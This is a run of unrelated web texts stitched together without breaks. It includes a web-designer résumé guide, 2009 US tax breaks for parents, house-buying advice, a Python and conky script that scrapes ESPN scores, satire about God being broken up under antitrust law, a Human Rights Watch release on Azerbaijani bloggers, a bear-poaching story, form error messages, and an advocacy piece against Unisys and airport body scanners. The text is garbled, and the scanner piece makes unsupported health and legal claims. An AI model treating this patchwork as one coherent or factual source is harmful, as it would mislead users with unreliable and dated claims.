She also loves arts and … More about Kat Neville …
How To Create A Great Web Designer Résumé and CV ?
Smashing Newsletter
Every week , we send out useful front - end & UX techniques .
Subscribe and get the Smart Interface Design Checklists PDF delivered to your inbox .
Your ( smashing ) email Subscribe →
The economy is bad .
No one ’s job is really 100 % safe , so it ’s time we all bucked up and got our recession bags packed ( just in case ! ) .
Your portfolio is already gorgeous , but have you created a drool - worthy resume ?
The economy is bad .
No one ’s job is really 100 % safe , so it ’s time we all bucked up and got our recession bags packed ( just in case ! ) .
Your portfolio is already gorgeous , but have you created a drool - worthy web résumé or design CV ?
This flimsy one - page document is more important than many people think : the web résumé is the first portfolio piece that potential employers see , and if they ’re not impressed , chances are they wo n’t look at the rest of your portfolio .
“ But I ’m not a print designer ! ” you moan .
It does n’t matter , and I do n’t want to hear your excuses !
You need to conquer this , because if you ’re a great Web designer , you do n’t want your first impression to be mediocre .
Further Reading on SmashingMag :
The Steve Stevenson Web Designer Résumé Challenge
Everyone likes a competition .
How about one in which ten good Web designers have to design the same résumé in only a few hours ?
Meet Steven Stevenson .
Steven Stevenson , a fictional Web designer , does n’t have a résumé .
The competition : each designer must translate his work experience , education and interests into their own unique style .
Watch and learn , people .
At the end is a summary of good tips for Web designer résumés .
( If you ’re interested in taking the challenge yourself , check out misterstevenson for all the rules these designers followed , Steven Stevenson ’s raw data and the chance to add your own entry . )
And in no particular order , here are the contestants ’ entries !
Contest Entries
Sam Brown made a real effort to distinguish between the three main components of Steve Stevenson ’s life and adds a touch of personality with some handwritten text and highlighting .
He shows he is n’t afraid to mix media but manages to do so in an elegant , fun way .
Download the PDF | Download the source file ( .ai )
Ali Felski ’s design is beautiful and simple , but manages to convey Steve Stevenson ’s strong design skills .
Her usage of colour is muted , but appropriate , and she ’s left out a lot of extra information that could clutter up this one page document .
Ali is also aware of the boundaries of the medium .
She says , “ A résumé should be designed well , but just like the Web , it has constraints , and even as designers , we should respect them . ”
Download the PDF | Download the source file ( .eps )
Chris Spooner opts for a purely typographic , clean design that showcases his ability to display information without the need for adornment .
Clean design is a skill that Steve Stevenson may possibly need should he be looking for a corporate Web design job , in which case he ’d need to present something simple and professional .
Download the PDF
Niamh Redmond makes Steve Stevenson ’s résumé stand out by choosing a landscape - style document with well - divided content and good branding .
Niamh says about her design : “ My aim was to design something in which each element served a function .
Every shape and line , the colors and their use , the font variations and text sizes were chosen to communicate something to the reader . ”
Download the PDF | Download the source file ( .eps )
Eva-Lotta Lamm chose to keep her résumé simple and typographic : “ The only illustrative element is Steve ’s little logo ( playing with the nice alliteration of his first and last name ) .
It is repeated as a small blue dot to separate different section sin the résumé . ”
The result is a beautiful , yet simple piece , which is easy to follow .
Download the PDF
Sarah Parmenter goes with a solid yellow background and a very prominent photo of Steven Stevenson ( who is quite cute ! ) .
She breaks up the copy and puts emphasis on his freelance work .
Download the PDF | Download the source file ( .ai )
Wez Maynard has simplified the information and given it lots of room to breath .
His design could easily be used as a Web design .
He ’s also given a lot of space and prominence to branding and has effectively separated the freelance work from the work experience .
Download the PDF
Luc Pestille has added some great imagery without making it unprintable .
He ’s allowed spaces for a photo and company logos , and he brings in arty spray - painting .
While most likely inappropriate for a corporate work environment , it is playfully suited to a funkier job opportunity .
Download the PDF | Download the source file ( .ai )
Ollie Kav chose to use Steve Stevenson ’s love of Japanese culture to organize his résumé .
These personal touches give the CV a huge dose of personality , which would give employers something interesting to speak with him about in the interview .
“ I ’ve based the design on the signage in the Tokyo subway stations , which has bright bold colors , ” Ollie says .
This boldness makes for a resume that shows Steve Stevenson ’s confidence and passion .
Download the PDF | Download the source file ( .indd )
Albert
Lo has broken an important rule by making his résumé virtually unprintable .
But he has also organized the information very differently : chronologically , with awards , skills and work all intertwined , just as they would be in real life .
Albert says his inspiration came from listening to house and trance ; his colors and illustration really communicate the type of designer he is .
Download the PDF
You can download all of these entries in a handy ZIP file ( 5 Mb ) .
Thanks to all designers for their participation !
10 Useful Tips For A Great Résumé Design
Let ’s now take a look at some useful ideas and guidelines that – in our humble opinion – may help you to achieve a great , compact and beautiful CV .
1. Make It a Summary
Your résumé needs to tell an employer ( at a quick glance ) the details most relevant to him or her .
This means the whole thing should fit on one page !
If you ’re a Web designer , keeping it short and punchy is even more important .
Sure , writing for Web is different than writing for print , but by showing your potential employer that you can keep things concise , you are actually showcasing an important Web skill .
Besides , you need to leave something to talk about in the interview !
2. Keep It Simple and Understandable
When designing a CV , remember first and foremost that you are a designer , but do n’t go overboard .
Many people over - design their résumé .
It ’s a chronic problem : they ’ll add so many fancy bits that the actual content gets lost .
Most design jobs are all about your ability to organize content , so simplify , simplify , simplify !
But that does n’t mean boring either .
“ Simple does n’t mean simplistic ; simple is hard to achieve , ” says Niamh .
Remember that you are applying for a design job , not to become a managerial assistant or to compete in an art college creativity competition .
3. Leave Some Details Out
Some people include their entire life history and every personal detail on their résumé .
Your job as a clerk at the corner store 10 years ago wo n’t ever get you a job in Web design .
Mentioning it only takes focus away from your relevant work experience .
Keep your marital status , age and grades off , too .
What if a potential employer wants to see your grades ?
Wez Maynard offers some great advice about this : “ If the employer wants to judge you on your grades and not your portfolio , believe me , you do not want to work for them . ”
4. Make It Perfect
You are a professional , so attention to detail is critical .
Everything on your CV should line up , every pixel should be absolutely perfect .
And even though the job is not to be a writer , a large proportion of employers throw away résumés with spelling or grammatical mistakes in them .
By making it perfect , you are showing potential employers that you are n’t sloppy and that you will care about every detail of their projects .
Get 10 people who can spell to look it over .
Just do it .
5. Use a Grid
Over and over , Web designers scream about “ the grid . ”
Why is the grid so important for a Web designer ’s résumé ?
If you ’re applying for a design job , the employer will most likely have an understanding of grids and baseline grids .
“ If you ’re not using a grid , you run the risk of giving the impression that you do n’t have an understanding of basic design principles , ” Olliekav warns us .
For those employers with no design background , grids make your résumé look cleaner and more organized .
6. Make It Printable
When working on designs for websites , you are allowed to have dark , moody and texture - heavy backgrounds .
They look fantastic on your browser , but they are simply inappropriate for web résumés .
Most CVs are printed out and given to hiring managers in batches , but not everyone has a photo - quality color printer ; and , without contrast , your background - heavy résumé will become illegible .
So make sure your résumé
matches the paper size for your country ( letter size for the US and A4 for the UK , for example ) , so that employers do n’t have to make any adjustments before printing , has a white background , looks okay in black and white , will print well at 300 dpi .
The best way to avoid a pixelated result is to create a PDF with embedded fonts .
7. Link to Your Online Projects
Displaying URLs for your projects is crucial .
If the employer will be viewing the résumé as a PDF , link the URLs back to your portfolio ( using anchors if it is very long ) or the projects themselves .
Here ’s how to create links in a PDF document .
( Many of the designers in the Steve Stevenson challenge noted that they would have done this , but because the applicant is fictional , the links would n’t have gone anywhere ! )
Once your résumé is printed out , it should serve as a quick reference for potential employers to check out your projects .
So , spell out the URLs alongside your project descriptions .
You do n’t need the http://www at the beginning of each URL , though .
8. Do n’t Use a Template
A little inspiration here and there never hurt anyone .
But imagine you submitted a web résumé and it was the exact same as someone else ’s ?
Gosh , would your face be red .
If you are a Web designer , you probably would n’t want to use a template for your portfolio website either .
Take some time and think about the impression you want to make : I bet it is n’t that you can enter data into a template .
Résumés are an often neglected aspect of a web designer ’s portfolio .
Make sure you update it every time you update your portfolio and make it accessible from your portfolio .
10 . Show Your Personality
You are a designer , so I hope you have your own style .
Steve Stevenson , from his interests , sounds like an interesting guy .
Olliekav used his love of Japanese culture to give his résumé a personal touch without going overboard .
If the job you ’re applying for requires a lot of creative thinking , the employer wants to know you ’re not a pixel pusher or a drone .
Let them know you have personality , a sense of humor and a sense of style .
Bonus : If You ’re Going to Break the Rules , Do It Well
Albert ’s resume is completely unprintable , but it ’s also absolutely beautiful .
If you ’re going to take risks like this , make sure you ’re willing to alienate a few haters en route to more creative employers who will appreciate your ability to think outside of the box .
Always make sure you ’re aware of the rules , and break them cautiously .
Done right , you ’ll shine from the crowd .
The web résumé is an oft - neglected piece of the Web designer ’s portfolio .
Make sure you update yours every time you update your portfolio , and make it accessible from your portfolio .
7 Income Tax Breaks – Thanks to Your Children
As April 15 inches closer for U.S. tax filers , it ’s time to get serious about looking for income tax breaks .
This includes tax credits and tax deductions related to your children .
Indeed , the fact that you have a family plays heavily in your favor at tax time , with existence of a number of tax breaks .
Look through your expenses for last year ( 2009 ) , and consider what is coming up for 2010 .
Get together your documentation , and find out if you are eligible for some of the tax breaks that come with children .
If you do n’t think you ’ll have time to do a thorough job , you can consider a tax return filing extension so that you have the time you need to make sure you turn in an accurate tax return that includes all of the breaks you are entitled to , including these 7 tax breaks that you can enjoy , thanks to your children :
$ 1,000 Child Tax Credit :
It you have a child under the age of 17 for the full year , you can get a $ 1,000 tax credit .
A tax credit acts sort of like a gift card .
You apply it after you have figured how much tax you owe , reducing the amount you have to pay .
There is a phase out , though .
For single parents , that phase out starts when adjusted gross income reaches $ 75,000 and for couples it starts at $ 110,000 .
You lose $ 50 of credit for every $ 1,000 you are over the cut off .
$ 3,650 Dependent Exemption :
If your child is 18 and under , or a full - time student 23 and under ( and not claimed as a dependent elsewhere ) for part of the tax year , you can claim a dependent exemption .
There is no age limit for disabled children .
Phase out begins at $ 250,200 for married filing jointly in 2009 .
But watch out !
That pesky AMT can phase you out at lower incomes .
Adoption Credit :
You are eligible for a credit of up to $ 12,150 ( dollar for dollar ) in the year that you adopt a child .
If you paid the expenses in the prior year , those are still eligible .
You can actually carry forward some of your expenses as well .
For special needs adoptions , you are eligible for the entire credit , even if your expenses did not reach $ 12,150 .
Phase out begins for couples who make $ 222,180 .
Dependent Care Credit :
If you pay for child care , you can get a credit to offset some of the costs — 20 % of what you pay , up to $ 3,000 for one child and up to $ 6,000 for more than one .
Except in the case of disability , the child must be 13 and under when you pay the expenses .
Eligible expenses include daycare , paid preschool , nanny services and after - school care .
Private , paid day school is n’t eligible .
Dependent Care Account :
This works if you ’ve got an awesome employer that offers the option of diverting some of your money to pay for eligible child care costs .
You can put up to $ 5,000 per couple into the account pre-tax , lowering your taxable income .
However , it is important to note that you have to coordinate this effort with dependent care credit .
Using this option means that you wo n’t get the dependent care credit in full .
Kids ’
Accounts :
You can use investment accounts in your children ’s names for sheltering purposes .
You open custodial accounts in your kids ’ names , and the first $ 950 of income is n’t taxed .
The next $ 950 is taxed at 10 % — which is the child tax rate .
Everything after is taxed at whatever rate you pay .
Good uses for money in these kinds of accounts are for non-essential expenses , like summer camp , music lessons and other costs .
529 Contributions ( State ) : No , you ca n’t get a federal tax deduction from 529 contributions .
But in 34 states and the District of Columbia , you can get get a deduction for contributing to the plans offered by those states .
In some states , you can even get a tax break for contributing to a plan out of state .
Double check the state income tax break possibilities for 529s in your location .
Before you take any of these tax breaks , double check your eligibility .
You want to be sure that you really are allowed to enjoy these breaks .
You can consult with a tax professional to get a better idea of what you are eligible for .
Actually , how to think about buying a house .
You do n't see a lot of ads trying to sell you on spending too much money on a house .
It 's more subtle than that .
The marketing is all around us , and has been for years .
The enormous social pressure and the expectations that come with it lead to misunderstandings and confusion .
Here 's my advice to someone in the market :
In an era where house prices rise reliably ( which was 1963 to 2007 ) , it was almost impossible to overpay for a house .
It was an efficient market , and rising prices cover many mistakes .
Investing in houses in the USA was a no - brainer .
More leverage and more at stake just paid off more in the end .
This consistent , multi- generational rise taught us more than an ad every could : buy a lot of house with as little downpayment as you could .
A house is not just an investment , it 's a place to live .
This is the only significant financial investment that has two functions .
Things like cars and boats always go down in value , so most of the time , if you 're investing , you 're doing it in something that you do n't have to fix , water , fuel or live in .
You should n't fall in love with a bond or a stock or a piece of gold , because if you do , you wo n't be a smart investor .
The problem ( as people who sell and fix and build houses understand ) is that you just might fall in love with a house .
What a dumb reason to make the largest financial investment of your life .
The psychology of down markets is irrational .
Rising house prices might be efficient ( many bidders for a single item lead to higher prices ) , but when there are n't so many bidders , irrational sellers ( see # 2 ) do n't lower their prices accordingly .
So , inventories get longer and it's easy for the prospective buyer to think that a certain price is the ' right ' price because so many people are offering houses at that price .
Just because someone offers a price , though , does n't mean it 's fair in a given market .
Along the same lines , anchoring has a huge impact on housing prices .
If someone offers a house for $ 800,000 and you think it 's worth half that , you do n't offer half that .
No , of course not .
The price is a mental and emotional anchor , and you 're likely to offer far more .
The social power of a house is huge .
When you buy a big house or an expensive house , you are making a statement to your in - laws , your family , your neighbors and yourself .
Nothing wrong with that , but the question you must ask yourself is , " how big a statement can I afford ? "
How much are you willing to spend on personal marketing and temporary self - esteem ?
Debt is an evil plot to keep you poor .
If buying a bigger house ( or even a house with a living room or a garage ) is going to keep you in credit card debt , you 've made a huge financial error , one that could cost you millions .
By the time you buy a house , you probably have a family .
Which means that this is a joint decision , a group decision , a decision made under stress by at least two people , probably people that do n't have a lot of practice talking rationally about significant financial decisions that also have emotional and social underpinnings .
Ooph .
You 've been warned .
Perhaps you could add some artificial rigor to the conversation so that it does n't become a referendum on your marriage or careers and is instead about the house .
If you have a steady job , matching your mortgage to your income is n't dumb .
But if you are a freelancer , an entrepreneur or a big thinker , a mortgage can wipe you out .
That 's because the pressure to make your monthly nut is so big you wo n't take the risks and do the important work you need to do to actually get ahead .
When you have a choice between creating a sure - thing average piece of work or a riskier breakthrough , the mortgage might be just enough to persuade you to hold back .
Real estate brokers , by law , work for the seller ( unless otherwise noted ) .
And yet buyers often try to please the broker .
You 'll never see her again , do n't worry about it .
[ Let me be really clear about what I wrote here , just in case you 'd like to misinterpret it :
When a prospect sees an ad or goes to an open house , she is about to interact with a broker .
That broker , in almost every case , is hired by the seller and has a fiduciary responsibility to the seller to get the very best price for the house .
There are exceptions , like buyer 's brokers , but those brokers , as I said , note that they are representing the buyer –how can you represent someone without telling them ?
Many brokers like to pretend to themselves that they are representing both sides , and while that 's a nice concept , that 's not the law . ]
You 're probably not going to be able to flip your house in nine months for a big profit .
Maybe not even nine years .
So revisit # 2 and imagine that there is no financial investment , just a house you love .
And spend accordingly .
I 'm optimistic about the power of a house to change your finances , to provide a foundation for a family and our communities .
I 'm just not sure you should buy more house than you can afford merely because houses have such good marketing .
“ Let ’s be honest .
The last Relapse CD was ehh . ”
First single off Recovery .
Shhh , do n’t wake Paul Rosenberg up .
YAF
Update : “ Not Afraid ” CDQ
Penguin & the iPad : Taking Books to the Next Level , or Leaving Them in the Dust ?
Steve Jobs debuts Apple 's new iPad at the Yerba Buena Gardens Theater in San Francisco , California , Wednesday , January 27 , 2010 .
( Karl Mondon / Contra Costa Times / MCT )
March Madness is here and and what better way to keep track of the action than with a scoreboard tracker at the bottom of your screen .
Check out the image below :
This is accomplished by combining a python script with the conky variable scroll .
The python script will get the data , parse it and put it into a acceptable format for conky to handle the display .
I ’ve talked about conky earlier and using displaying the last instant message .
Copy the following code and save it as bottomscore .py
#!/usr/bin/python import urllib #
Open html page fweb = urllib.urlopen ( " http://scores.espn.go.com/ncb/bottomline/scores " ) gamestr= '' score= ''
# Manipulate str for unneccessary chars raw=str ( fweb.readline ( ) ) raw=raw.replace ( '% 20 ' , ' ') ; raw=raw.replace (' ^ ' , '' ) ; raw=raw.replace ('&' , '
') # Open data storage f=open ( ' bottom.dat ' , 'w ' ) f.write ( raw ) f.close ( ) f=open ( ' bottom.dat ' , 'r ' ) #
Parse each line , get game , create str , append str for line in f : if line . find ( ' _left ' ) > 1 : gamestr=line[line.find ('= ' ) + 1 : - 1 ] score= score + gamestr + ' | ' f.close ( ) print score
My conky script is as follows .
Save this
#avoid flicker double_buffer yes #own window to run simultanious 2 or more conkys own_window yes own_window_transparent no own_window_type normal own_window_hints undecorate , sticky , skip_taskbar , skip_pager , above #borders draw_borders no border_margin 0 # shades draw_shades no #position gap_x 0 gap_y 0 alignment bottom_middle # behaviour update_interval 1 #colour default_color 8f8f8f #default_shade_color 000000 own_window_colour 262626 text_buffer_size 1400 # font use_xft yes xftfont bauhaus : pixelsize=10 # to prevent window from moving use_spacer none minimum_size 1400 TEXT $ {color e0e0e0} $ {scroll 2847 $ {execpi 60 python ~/ scripts/bottomscore .
py}}
Remember to edit your .conkyrc to run the right path to bottomscore .py .
You may need to edit certain parameters for your screen resolution but this should give you a good start .
Any questions , post a comment .
Pro Tip : To run multiple conky screens : ” conky - c .conkyrc2 ″
WASHINGTON , DC — Calling the theological giant 's stranglehold on the religion industry " blatantly anti-competitive , " a U.S. district judge ruled Monday that God is in violation of anti-monopoly laws and ordered Him to be broken up into several less powerful deities .
Advertisement
" The evidence introduced in this trial has convinced me that the deity known as God has willfully and actively thwarted competition from other deities and demigods , promoting His worship with such unfair scare tactics as threatening non-believers with eternal damnation , " wrote District Judge Charles Elliot Schofield in his decision .
" In the process , He has carved out for Himself an illegal monotheopoly . "
The suit , brought against God by the Justice Department on behalf of a coalition of " lesser deities " and polytheistic mortals , alleged that He violated antitrust laws by claiming in the Holy Bible that He was the sole creator of the universe , and by strictly prohibiting the worship of what He termed " false idols . "
Advertisement
" God clearly commands that there shall be no other gods before Him , and He frequently employs the phrase ' I AM the Lord ' to intimidate potential deserters , " prosecuting attorney Geoffrey Albert said .
" God uses other questionable strongarm tactics to secure and maintain humanity 's devotion , demanding , among other things , that people sanctify their firstborn to Him and obtain circumcisions as a show of faith .
There have also been documented examples of Him smiting those caught worshipping graven images . "
Attorneys for God did not deny such charges .
They did , however , note that God offers followers " unbeatable incentives " in return for their loyalty , including eternal salvation , protection from harm , and " fruitfulness . "
Advertisement
" God was the first to approach the Jewish people with a ' covenant ' contract that guaranteed they would be the most favored in His eyes , and He handed down standards of morality , cleanliness , and personal conduct that exceeded anything else practiced at the time , " lead defense attorney Patrick Childers said .
" He readily admits to being a ' jealous ' God , not because He is threatened by the prospect of competition from other gods , but because
He is utterly convinced of the righteousness of His cause and that He is the best choice for mortals .
Many of these so - called gods could care less if somebody bears false witness or covets thy neighbor 's wife .
Our client , on the other hand , is truly a ' People 's God . ' "
In the end , however , God was unable to convince Schofield that He did not deliberately create a marketplace hostile to rival deities .
God 's attorneys attempted to convince the judge of His openness to rivals , pointing to His longtime participation in the " Holy Trinity , " but the effort failed when Schofield determined that Jesus Christ and the Holy Ghost are " more God subsidiaries than competitors . "
Advertisement
To comply with federal antitrust statutes , God will be required to divide Himself into a pantheon of specialized gods , each representing a force of nature or a specific human custom , occupation , or state of mind .
" There will most likely be a sun god , a moon god , sea god , and rain god , " said religion - industry watcher Catherine Bailey .
" Then there will be some second - tier deities , like a god of wine , a goddess of the harvest , and perhaps a few who symbolize human love and / or blacksmithing . "
Advertisement
Leading theologians are applauding the God breakup , saying that it will usher in a new era of greater worshipping options , increased efficiency , and more personalized service .
" God 's prayer - response system has been plagued by massive , chronic backlogs , and many prayers have gone unanswered in the process , " said Gene Suozzi , a Phoenix - area Wiccan .
" With polytheism , you pray to the deity specifically devoted to your concern .
If you wish to have children , you pray to the fertility goddess .
If you want to do well on an exam , you pray to the god of wisdom , and so on .
This decentralization will result in more individualized service and swifter response times . "
Advertisement
Other religious experts are not so confident that the breakup is for the best , pointing to the chaotic nature of polytheistic worship and noting that multiple gods demand an elaborate regimen of devotion that today 's average worshipper may find arduous and inconvenient .
" If people want a world in which they must lay burnt offerings before an earthenware household god to ensure that their car will start on a cold winter morning , I suppose they can have it , " said Father Thomas Reinholdt , theology professor at Chicago 's Loyola University .
" What 's more , lesser deities are infamous for their mercurial nature .
They often meddle directly in diplomatic affairs , abduct comely young mortal women for their concubines , and are not above demanding an infant or two for sacrifice .
Monotheism , for all its faults , at least means convenience , stability , and a consistent moral code . "
Advertisement
One deity who is welcoming the verdict is the ancient Greek god Zeus , who described himself as " jubilant " and " absolutely vindicated . "
" For thousands of years , I 've been screaming that this third - rate sky deity ripped me off wholesale , " said Zeus , speaking from his Mt. Olympus residence .
" Every good idea
He ever had He took from me :
Who first created men in his own image ?
Who punished mankind for its sins ?
Who lived eternally up in the clouds ?
And the whole fearsome , patriarchal , white - beard , thunderbolt thing ?
I was doing that eons before this two - bit hustler started horning in on the action . "
Advertisement
Lawyers for God say they plan to appeal Schofield 's ruling and are prepared to go all the way to the Supreme Court if necessary .
" This decision is a crushing blow to God worshippers everywhere , and we refuse to submit to a breakup until every possible avenue of argument is pursued , " Childers said .
" I have every confidence that God will ultimately win , as He and His lawyers are all - powerful . "
( New York ) - The Azerbaijani government should release two bloggers who have been detained since July 2009 as the result of a staged fight designed to frame them , Human Rights Watch said today .
The bloggers , Emin Milli and Adnan Hajizade , lost their appeal against their conviction today .
In a hearing that lasted two and a half hours , the Baku Appeal Court upheld the trial court 's decision in November , convicting Milli and Hajizade of hooliganism and inflicting minor bodily harm .
The Appeal Court did not examine the two bloggers ' central contention , that the attack that led to their conviction had been deliberately staged to frame them , even though multiple witnesses would corroborate their claim .
" Today 's ruling is yet another setback for freedom of expression in Azerbaijan , " said Giorgi Gogia , South Caucasus researcher for Human Rights Watch .
" The case is blatantly part of a pattern of prosecutions in which the authorities have brought trumped - up charges against outspoken journalists and activists in Azerbaijan . "
Milli was sentenced to two years in prison and Hajizade to two and a half years .
Milli is a blogger for an online television site and a coordinator of exchange student alumni .
Hajizade is a video blogger .
Both had satirized the government in blog postings , including on Facebook , Twitter , and YouTube , in the weeks preceding the attack .
The defendants allege that on July 8 , 2009 , they had been talking about their youth movement in a Baku restaurant when two strangers approached them , demanded that they stop discussing such matters , and attacked and injured them .
That evening , Milli and Hajizade went to the police station , filed reports about the attack , and requested medical assistance .
Instead of providing them with medical assistance , the police interrogated the youths for five hours without their lawyers and charged them with hooliganism .
The alleged attackers were set free .
Milli and Hajizade were not permitted access to their lawyers until late on the following day .
The restaurant fight appears to have been staged to provide grounds for a bogus case against the two bloggers , Human Rights Watch said .
The trial , held by the Sabail District Court , was closed to media due to unspecified concerns about the need for witness protection .
The prosecution claimed that Milli and Hajizade started the fight , but several witnesses testified that Milli and Hajizade had been attacked .
Journalists and media representatives in Azerbaijan have been harassed , threatened , or attacked for their professional activities , and defamation and other criminal charges have been used to prosecute opposition and independent journalists .
At least three journalists are currently behind bars on spurious criminal charges .
" The continued imprisonment of Milli and Hajizade reflects growing government hostility toward freedom of expression , " Gogia said .
" The government has a chance to prove the contrary , by setting them free . "
Pennsylvania has a three - day bear hunting season
A hunter in the American state of Pennsylvania has been fined nearly $ 7,000 ( £ 4,569 ) for luring a bear to a sticky end with a trail of doughnuts .
Charles
Olsen enticed the large black bear into his gunsights with pastries and illegally shot it , police said .
Mr Olsen attracted the attention of the Game Commission when his truck , laden with sugary treats , was spotted on a road a week before bear season .
The " pastry poacher " was found guilty of violating several game laws .
Mr Olsen was arrested last November when he attempted to register the bear , which weighed 707 lbs ( a third of a tonne ) , the Pittsburgh Post - Gazette reported .
It would have been the biggest trophy claimed during the state 's three - day bear hunting season had it been killed legally , the newspaper said .
The 39 - year - old , of Wilkes - Barre , Luzerne County , was rumbled when a Game Commission wildlife conservation officer spotted his truck loaded with pastries from a local shop and traced the licence number .
The officer , Cory Bentzoni said : " Being that we were so close to bear season , seeing that person drive by with an unusual amount of pastries was like watching an individual go down a row of parked vehicles testing each handle to see if it would open .
" Something just did n't seem right , " he was quoted as saying by PR Newswire .
Mr Olsen could also lose his hunting and trapping privileges for at least three years after Thursday 's hearing , it is reported .
Afganistan Aland Albania Algeria American Samoa Andorra Angola Anguilla Antarctica Antigua and Barbuda Argentina Armenia Aruba Australia Austria Azerbaijan Bahamas Bahrain Bangladesh Barbados Belarus Belgium Belize Benin Bermuda Bhutan Bolivia Bosnia and Herzegovina Botswana Bouvet Island Brazil British Indian Ocean Territory Brunei Darussalam Bulgaria Burkina Faso Burundi Cambodia Cameroon Canada Cape Verde Cayman Islands Central African Republic Chad Chile China Christmas Island Cocos ( Keeling ) Islands Colombia Comoros Congo ( Brazzaville ) Congo ( Kinshasa ) Cook Islands Costa Rica Cote d'Ivoire Croatia Cyprus Czech Republic Denmark Djibouti Dominica Dominican Republic Ecuador Egypt El Salvador Equatorial Guinea Eritrea Estonia Ethiopia Falkland Islands Faroe Islands Fiji Finland France French Guiana French Polynesia French Southern Lands Gabon Gambia Georgia Germany Ghana Gibraltar Greece Greenland Grenada Guadeloupe Guam Guatemala Guernsey Guinea Guinea - Bissau Guyana Haiti Heard and McDonald Islands Honduras Hong Kong Hungary Iceland India Indonesia Ireland Isle of Man Israel Italy Jamaica Japan Jersey Jordan Kazakhstan Kenya Kiribati Korea , South Kuwait Kyrgyzstan Laos Latvia Lebanon Lesotho Liberia Liechtenstein Lithuania Luxembourg Macau Macedonia Madagascar Malawi Malaysia Maldives Mali Malta Marshall Islands Martinique Mauritania Mauritius Mayotte Mexico Micronesia Moldova Monaco Mongolia Montenegro Montserrat Morocco Mozambique Namibia Nauru Nepal Netherlands Netherlands Antilles New Caledonia New Zealand Nicaragua Niger Nigeria Niue Norfolk Island Northern Mariana Islands Norway Oman Pakistan Palau Palestine Panama Papua New Guinea Paraguay Peru Philippines Pitcairn Poland Portugal Puerto Rico Qatar Reunion Romania Russian Federation Rwanda Saint Helena Saint Kitts and Nevis Saint Lucia Saint Pierre and Miquelon Saint Vincent and the Grenadines Samoa San Marino Sao Tome and Principe Saudi Arabia Senegal Serbia Seychelles Sierra Leone Singapore Slovakia Slovenia Solomon Islands Somalia South Africa South Georgia and South Sandwich Islands Spain Sri Lanka Suriname Svalbard and Jan Mayen Islands Swaziland Sweden Switzerland Taiwan Tajikistan Tanzania Thailand Timor - Leste Togo Tokelau Tonga Trinidad and Tobago Tunisia Turkey Turkmenistan Turks and Caicos Islands Tuvalu Uganda Ukraine United Arab Emirates United Kingdom United States Minor Outlying Islands United States Uruguay Uzbekistan Vanuatu Vatican City Venezuela Vietnam Virgin Islands , British Virgin Islands , U.S. Wallis and Futuna Islands Western Sahara Yemen Zambia Zimbabwe Other
Please fill in the required fields .
Please enter a valid email and password ( min 6 characters ) .
Your password should not contain only spaces .
Please enter a valid email .
Please enter a valid phone number .
Please enter a valid password ( min 6 characters ) .
Please accept Monitis terms of service .
Server is not responding .
Please try again later .
An error occurred .
Please try again later .
This email address is already in use .
You will get an email confirming your configuration request .
Sorry , but we do n't accept Sign Ups with emails from this domain .
Oops , our minimum fee is 12 USD per month or 100 USD per year .
Please order more services to proceed .
Oops , our minimum fee is 12 USD per month ( Without VAT ) .
Please order more services to proceed .
Oops , our minimum fee is 100 USD per year ( Without VAT ) .
Please order more services to proceed .
VAT ID is invalid
© Unisys
" Deception by an omission of the truth is as bad as a lie . "
Jennifer Chiaverini
Perverted airport workers ogling at images of female colleagues passing through the scanners .
The failed trials of this technology that breaks child pornography laws
The privacy issues resulting from scanners that ' show passengers naked '
Health risks of miscarriages and DNA damage from the dangerous levels of radiation :
Who is Unisys ?
For more than 50 years , our federal government clients have trusted Unisys to help them support their mission - critical programs .
When it comes to protecting your assets , data , systems , and citizens , we deliver the best combination of industry and subject matter expertise - every time .
Governments around the world trust Unisys to help them solve their business problems through systems that optimize the organization and secure the enterprise .
New solution builds on Unisys experience with advanced biometric technologies to enhance security , speed passenger processing time and reduce costs [...]
Drawing on the company 's experience with the aviation industry and advanced biometric - based security solutions for governments and commercial organizations , the new Unisys solution will integrate the various stages of the air passenger experience with a biometric component to uniquely identify each passenger .
The end - to - end solution covers the key touch points of air travel : from electronic boarding passes , to boarding plane , to passing through immigration , to baggage collection .
" Travelers around the world are being squeezed by a growing number of critical but costly and inconvenient airport security procedures that are taking the joy out of traveling , " said Terry Hartmann , vice president , identity and credentialing global practice , Unisys .
" With the technologies we have today , air travel does n't have to be such a difficult experience .
Unisys has extensive experience applying advanced biometric technology to address the most demanding identification challenges , and we look forward to helping airports , airlines and immigration agencies make better use of these technologies to bring a new level of convenience and efficiency to air travel . "
Unisys clients are typically large corporations or government agencies , and have included various branches of the U.S. military , the Federal Aviation Administration ( FAA ) , numerous airports , the General Services Administration , U.S. Transportation Security Administration and Internal Revenue Service
Unisys operates the world 's largest RFID network for the U.S. military , tracking 9 million containers yearly to 1,500 nodes in 25 countries .
It also created the universal identification card for citizens of South Africa .
One of Unisys ' partners is OSI systems - the manufacturer of the Rapiscan naked body scanner
In 2003 and 2004 , Unisys paid influential lobbyist Jack Abramoff $ 640,000 .
Abramoff raised $ 100,000 for Bush 's 2004 campaign representing clients lobbying the White House , including Unisys Corp .
In January 2006 , Abramoff pleaded guilty to five felony counts for various crimes related to his federal lobbying activities .
The lobbying activities of Abramoff and his associates are now the subject of a large federal investigation
In October 2005 , the Washington Post reported that the company had allegedly over - billed on the $ 1 to 3 billion Transportation Security Administration contract for almost 171,000 hours of labor and overtime at up to the maximum rate of $ 131.13 per hour including 24,983 hours not allowed by the contract .
Unisys denied any wrongdoing
In 2009 Richard Marcello , president of technology , consulting , and integration solutions at Unisys said " We were able to eliminate a whole bunch of actually U.S. - based jobs and kind of replace them with two folks out of India "
issue : which of the following statements describe your willingness to sacrifice some privacy for enhanced personal security and convenience when you travel by air ?
Some Privacy ?
Enhanced Security ?
" Authoritative claims that officials at the [ UK ]
Department for Transport and the Home Office have already tested the scanners and were not persuaded that they would work comprehensively against terrorist threats to aviation . " .
Convenient ?
issue :
To board an aircraft , which of the following statements describe your willingness to allow naked images to be taken of you through radiation - emitting procedures with health risks so that technology companies can make huge profits ?
The mainstream media was quick to publicise the findings of a survey that showed widespread public support for the global drive to install ' naked ' full - body scanners at airports .
Articles such as Sky News : UK Holidaymakers Back Use Of Full - Body Scanners and Agence France - Presse : Opinion poll : US anti-terror too lax , uncritically repeated the report 's findings without questioning the reliability of the survey or mentioning the conflict of interests held by those in the security industry who stand to profit from rolling out these dangerous machines .
There is one glaring omission from these and the many media reports that published ' news ' articles based on the Unisys press release .
That is who Unisys is , their connections with government , military , Homeland security , the Transportation Services Authority ( TSA ) and how they profit from airport security technologies .
The failure of the mainstream media to report the true source and motives behind this survey is a clear example of how they lie by omitting the most important facts .
The survey generated headlines in Austrailia New Zealand , America and the UK .
